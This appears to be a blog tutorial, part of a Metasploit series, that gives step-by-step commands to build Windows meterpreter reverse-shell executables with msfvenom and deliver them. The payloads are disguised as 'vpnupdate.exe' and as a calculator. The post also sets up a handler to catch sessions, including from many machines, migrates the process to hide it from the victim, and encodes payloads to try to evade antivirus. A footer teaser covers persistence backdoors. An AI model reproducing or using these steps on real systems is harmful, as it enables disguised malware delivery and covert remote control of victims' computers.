Generating Payloads using Msfvenom - Metasploit Part 5

-

Generating and encoding Payloads using 

Msfvenom


Well aparantely msfvenom is a seperate tool from msfconsole which is used to generate payloads but it doesn't mean that we cannot create payloads using msfconsole but the advantage of using msfvenom is that there is no need for us to be in the msfconsole to generate payloads but no worries we will be covering both the methods :)

So let's hop onto it shall we !

Command :

msfvenom --list

Fig : 1.1



In Fig : 1.1 we can see using the command we can list a brief instructions on how to use different options with it

To list different types of modules we can use

Command :

msfvenom --list [modules] eg:payloads

Fig : 1.2



In Fig : 1.2 we can see the different types of available payloads we can use with msfvenom and obviously it is going to take a while when you execute the command to load loads of payloads

Let's create a meterpreter staged payload

Command :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=port_number -f exe -o vpnupdate.exe

-p : used to specify the payload

-f : defines the file type which is exe in our case

LHOST : listening host

LPORT : listening port

-o : used to decide the filename and location

Fig : 1.3


In Fig : 1.3 we can see the payload created but also notice that msfvenom sets the payload type to windows and architecture to x86 when no options regarding them are explicitly mentioned and one another thing to be noted is that metasploit by default generates a 32-bit payload which is executable in both 32 bit system and 64 bit system  and which isn't the case if you generate 64 bit payload as it only gets executed in 64 bit system.

Payload behaviour :

Upon execution of the payload on the victim machine , it tries to connect to the sepcified listening host with the help of LHOST and LPORT optoins we have specified

Note:

The Listening host and the Listening port are not to be forgoten as we need them later when we use multi-handler to catch the connection

We can also view all the options that could be customised with respecitve payload

Command :

msfvenom -p PayloadOfYourWish --list-options

Fig : 1.4


In Fig : 1.4 we can see the options we could with the payload which is windows/meterpreter/reverse_tcp

As we are done with generating the payload before sending the payload to the target machine lets set up
multi-handlers through msfconsole to handle the connections we receive upon execution of the payload on the victims machine as firstly we shall be ready listening for connections

Commands :

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

Fig : 1.5


In Fig : 1.5 set the payload to windows/meterpreter/reverse_tcp as it connection we are going to receive from the victim machine upon execution of the payload

To view the options

Command :

show options

Fig : 1.6



In Fig : 1.6 we can see that we need to set the listening host and listening port 

Command :

set LHOST=192.168.233.235

set LPORT=9999

Note that the values of listening host and listening port should match the values of those when used while creating the payload

Fig : 1.7


lets run the multi-handler in the background

Command :

run -j

Now its to send it to the victim machine which is window 7 in my case

Here I am transfering the files to the victim machine using a simple python httpserver , but in real life scenarios the payload is sent through social engineering attacks 

To start a Simple Python HttpServer 

Command :

python3 -m http.server

Fig : 1.8


In Fig : 1.8 we have start an Simple Python HttpServer

Now lets connect and download the file in our windows 7 machine

Fig : 1.9


Refering Fig : 1.9 click on save the file and save it at any location as you wish

Now you can execute the file so it connects back to our attacker machie

Fig : 2.0


In Fig : 2.0 we can see that the multi-handler had caught a connection and a sesssion is opened

Commands :

sessions -i SessionNumber

getuid

Fig : 2.1


In Fig : 2.1 notice that our privilage level on the target machien is decided in context of the user who clicked on the payload , so if the user who clicks on the payload is a regular user , we get regular privilages , if the user who clicks on the payload is administrator then we get administrator privilages

TipšŸ’”: 

If you have noticed our multi-handler process on the background had ended upon catching a session which feels like no problem as it had done its jobs catching the session and we have nothing to do with it but when it comes to real life pentesting we send our payloads to hundreds of machines which obviously means that we receive a lot of connections and we want to catch 'em all and happy to say that it is totally possible :) by setting an option before you hit that run 

set ExitOnSession false

You will not see this options when you execute show options command or even show advanced but its just there for someone to use it :)


So now lets list the processes and lets take a look

Fig : 2.2



Oo Ooo thats no good if the victim lists the processes on his machine and finds out the process running in the background but we can get away with it and that what the command's meaning as well ! funny me :)

Command :

migrate PID

Fig : 2.3



And now if you list the processes your cheesy process will be nowhere :)


Now we have an understanding on how to create payloads and catch the connections using msfvenom , lets also see how to create payloads using metasploit as well

Command :

use payload

Until now we have been setting up the payloads of our wish , To be executed on the target machine upon exploitation but now it time to use them

Fig : 2.4


In Fig : 2.4 we can see the different options upon using the show options command which are necessary to create a payload

set the LHOST and LPORT according to your machine settings

Now options syntax for generating the payload is similar as we have done with msfvenom 

Command :

generate -f exe -o linux_reverse_shell.exe

Fig : 2.5


In Fig : 2.5 we can see the generated payload and for now customization use help generate command

Now we know how to create payloads , Its time to encode them !

Encoding :

We encode our payload so that it could handle the bad characters when we write them . Many people confuse this with antivirus evasion technique which isn't true . antivirus evasion is a byproduct of encoding a payload . So remember that encoding a payload may do the antivirus envasion but its not garunteed to do so as it is not meant for it.

To list all the encoders 

Command :

show encoders

Fig : 2.6



In Fig : 2.6 we can see different available encoders

Now lets create a payload using an encoder

Command :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_machine_ip LPORT=port_number -e x86/shikata_ga_nai -f exe -o encoded_vpn_update.exe

-e : used to specify the encoder we wanted to  use

Fig : 2.7


In Fig : 2.7 we can see the payload created using the x86/shikata_ga_nai encoder which is very promising encoder to use . We can also see iteration=0 which tells that the paylaod is encoded one time.
We can encode a payload multiple times as well . 

Command : 

msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_machine_ip LPORT=port_number -e x86/shikata_ga_nai -i 7 -f exe -o encoded_vpn_update.exe

Fig : 2.8


Being that said it is not to be mistaken as more the iterations more the chances of bypassing the anti-virus . It is possible that a 3 time encoded payload might bypass the anti-virus system whereas a 10 time encoded payload gets caught by the same anti-virus system. So I want you to stick this in your mind until your name's written on stone :)

Hiding behind the Masquerade :

What if the victim the victim downloaded our paylaod and it looks like it  what it said ! For instance what if our payload looks like a calculator or Well I feel dope just by hearing it , So lets get it done

firstly we need to downlaod the calc.exe file from remote windows machine to use it as a template while creating the payload  so that it looks the same way and we know how to do it so imma skip it . location of calc.exe on windows is C:\Windows\system32\

Command :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.23.235 LPORT=9999 -f exe -x calc.exe -o calculator.exe

-x : uses the specified existing executable as a template at the time of existing

Fig : 2.9


Now let download it on to the windows 7 machine by setting up our machine as a python http server

Fig : 3.0


Fig : 3.1


In Fig : 3.1 we can see it exactly looks like a calculator and the properties and perfect as well ! 

Fig : 3.2


In Fig : 3.2 we can see the session interaction !!

Note :

I have left the multi-handler setup to you this time , you've gotta pull it off . Don't let me down :)

You also have a -k or --keep option which helps you replicate the functionality of the specified executable but its not guaranteed to work thought but I encourage to try it.


That all for this blog , Can't wait you see you again !

--------------------------------------------------------------------NOT THE END-----------------------------------------------------------------

Comments

Post a Comment

Popular posts from this blog

Learning Nmap Host Discovery with iptables and Wireshark Analysis

-
Image
Learning Nmap Host Discovery with Iptables  and Wireshark Analysis Finally the wait is no longer , we are going to learn host discovery using nmap in a very detailed way. Well you might say that there are many videos and blogs out there what is special about this one ? , In this blog I will be sharing my knowledge after going through several videos , nmap book and many other blogs in the most detailed way possible , well you will see the difference after going through the blog . When I say I really mean it . Heads up !! you must know basis of iptables before going through the blog  and you might ask why ? coz we not just learning just by saying that nmap blocks the packets so this host discovery isn't going to work.  we are going to block the packets and run the discovery again and bypass the our rules ourselves that how this blog is designed very thing is practical practical and practical . How cool is that ?!. well I wrote blog on iptables just for you !! click here an...
Read more

Persistence Techniques with Metasploit - Part 6

-
Image
     Persistence Techniques with Metasploit Getting a shell in real world requries a lot of hardwork and research , All this work put in so that we will be ok to loose the session when the user logs off or turns the computer off ? Hell no ! , we need to make our connection persistance so that we can get back alive when the computer's on or when the user logs in. And we will be taking a look into the post module section which helps us to make our connection persistence after exploiting the target machine. Note : For creating a persistence backdoor you should have already compromised the target machine and have the meterpreter shell  Pov : you have already exploited the target machine and had a meterpreter shell Commands :  use exploit/windows/local/persistence_exe show options Fig : 1.1 In Fig : 1.1 we can see the different options availabe REXENAME option defines the name of the exe file the module is going to put on the remote system REXEPATH denotes the local ...
Read more